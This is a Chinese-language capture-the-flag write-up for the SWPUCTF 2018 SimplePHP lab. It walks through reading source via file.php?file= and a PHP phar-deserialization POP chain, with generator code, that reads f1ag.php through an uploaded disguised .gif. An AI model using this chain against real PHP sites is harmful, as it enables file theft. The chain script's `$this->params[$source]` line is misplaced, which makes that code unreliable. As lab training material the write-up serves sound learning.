SWPUCTF 2018 SimplePHP_0x50-0x5F

如图,只有两个功能点,查看文件和上传文件

image-20211107215628202

上传文件功能点只能上传图片。

点击查看链接观察url

http://a81afb6c-5cd8-4138-ab47-82856e1ae1b1.node4.buuoj.cn:81/file.php?file=

尝试在file后加一些东西

http://a81afb6c-5cd8-4138-ab47-82856e1ae1b1.node4.buuoj.cn:81/file.php?file=index.php

image-20211107215818863

surprise!

继续,依次读取各个页面的源码

file.php

<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
    echo "<h2>There is no file to show!<h2/>"; 
} 
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){ 
    die('file doesn\'t exists.'); 
} 
?> 

function.php

<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?> 

class.php

 <?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        }
public function __wakeup()
{
    if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
        echo "hacker~";
        $this->source = "index.php";
    }
}
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

首先观察敏感函数,我们发现了file_get_contents(),如何利用它呢,我们尝试寻找可以反序列的点。

但是本文中并没unserialize,这时候我们就可以采用phar://协议,可以达到反序列化的效果。

下面我们就要考虑,如何利用file_get_contens()这个敏感函数。

反序列化,最重要的就算里面的一些魔术方法,我们可以进行调用。

__toString 在echo一个类的时候调用

__get 未定义的属性或没有权限访问的属性被访问时该方法会被调用

下面我们来尝试构建pop利用链。

我们全局搜索$value这个变量,发现它是由get穿过来的

image-20211107220543645

我们的目标是什么呢?

使$value可控!

我们再全局搜索$key并没有发现可以传入的地方,那么说明它不受我们控制。

那我们就要突破这个点。

如何构造,使它受我们控制。

image-20211107220958104

我们可以使用这个魔术方法:

当我们在Test()这个类中调用一个不存在的属性的时候就会调用它,因此我们可以通过这个方法来传入我们想要的东西。

那么如何调用Test()呢?

我们可以发现:

image-20211107221351753

Test()类中不存在source,我们可以令str[‘str’] = new Test() 来调用。

而调用__toString,又需要echo这个类

我们可以利用这里

image-20211107221800425

好了,上面我们都是逆推,现在我们可以理一下pop链的顺序。

调用C1e4r()中的魔术方法__destruct ——- 调用Show()中的 toString() ——— 传入Test调用不存在的属性从而调用 get

pop链代码如下:

 <?php
class C1e4r
{
    public $test;
    public $str;
}

class Show
{
    public $source;
    public $str;
}

class Test
{
    public $file;
    public $params;
}


$a = new C1e4r();
$b = new Show();
$c = new Test();
$a->str = $b;
$b->str['str'] = $c; //因为这里会调用source,从而会调用下边的source,所以下边的params也要接受$source
$this->params[$source] = '/var/www/html/f1ag.php';

@unlink("sakura.phar");

$phar = new Phar("sakura.phar"); //后缀名必须为phar

$phar->startBuffering(); //开始缓冲 Phar 写操作

$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$phar->setMetadata($a); //将自定义的meta-data存入manifest

$phar->addFromString("sakura.txt", "sakura"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

?>

放在本地环境,访问,会生成一个sakura.phar文件

发现无法上传,将后缀改为.gif

image-20211107223436308

上传后。

访问

http://a81afb6c-5cd8-4138-ab47-82856e1ae1b1.node4.buuoj.cn:81/upload可以获得文件名

然后利用phar解析

http://a81afb6c-5cd8-4138-ab47-82856e1ae1b1.node4.buuoj.cn:81/file.php?file=phar://upload/c8875103fcefc5560e4783a36e5faa18.jpg

获得flag

image-20211107223535835

image-20211107223555802